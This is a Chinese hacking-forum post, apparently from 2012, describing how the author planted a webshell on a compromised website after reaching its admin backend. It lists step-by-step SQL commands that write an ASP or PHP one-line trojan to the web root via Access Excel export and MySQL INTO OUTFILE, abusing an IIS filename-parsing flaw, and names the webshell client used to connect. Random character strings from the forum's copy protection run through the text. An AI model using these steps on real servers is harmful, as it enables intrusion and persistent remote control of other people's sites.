找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1907|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
# C/ c6 D+ k; C* swebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
6 z' n! t" L; z2 L5 o+ R$ |6 X+ }文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了," ?- f# K# R  |) a5 ^' Y1 J' S
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:- P+ R9 @, @" V, t2 ~8 q) I
1.create table cmd (a varchar(50))
" m6 L0 \" `! C# z0 h6 o, m3 \2.insert into cmd (a) values (‘‘)- D/ t( S% I9 H) [
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
, W0 ]) p' \8 e  K) E- U) K(把表cmd的内容导出为物理路径的一个EXCEL文件)
3 [0 V/ s* ^9 O8 [( g4.drop table cmd
* x: r$ O0 P, j9 L, d6 I利用IIS的BUG成功拿到了WEBSHELL。
* P0 a2 @3 t# e0 b! C) E
3 d: K+ W5 c1 @- g直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话! u2 p0 e# u5 i
/ _- R5 l. J# i
  SQL语句意思解释:% o! W; S8 f; m9 _% J# G  `- t4 A8 W% Q& p
  第一句9 b8 Q$ v) L, ^# Z& q, |3 y! x
  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为506 F+ Z! y3 ]* f4 s/ G  P
# m+ R9 U! @) m. I/ }$ m" n+ R
  第二句( C& ]$ U: \8 S7 M
  在表cmd的a字段插入一句话木马( B$ |5 h# R: O$ O% |
  第三句6 m4 H* d6 p- T0 a, ~6 W+ w4 m
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件% b& v6 f; R7 B4 m0 u

! ^( s( O: _7 z) h+ B# Z  第四句
) Y9 O; }9 _" u) Y) ^2 I  删除建立的cmd表: k+ ]& u4 H8 ~% F
6 B- u5 s: Z6 G
  以下内容为测试:
# ?  T+ l: I( R3 w1 E- X  Access利用后台SQL执行命令功能导出WebShell:. @$ \$ X3 z" P: C7 b
  这个更简单:
( N8 z- Z, S7 W( V/ V: w  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]# |: q& X6 R" M- Z' w# [
  或者* g- v# D  F$ K
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
9 x# f: X" m  P' w) f' D! T1 Z( e+ D& F/ Z9 h! Z; H/ `9 r! Z
  后台有执行SQL语句功能(vote为已知表段)
" |% G* [* z; |, O  希望对大家有所帮助拿shell的又一个思路
5 y+ n# y7 l& t1 _. p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表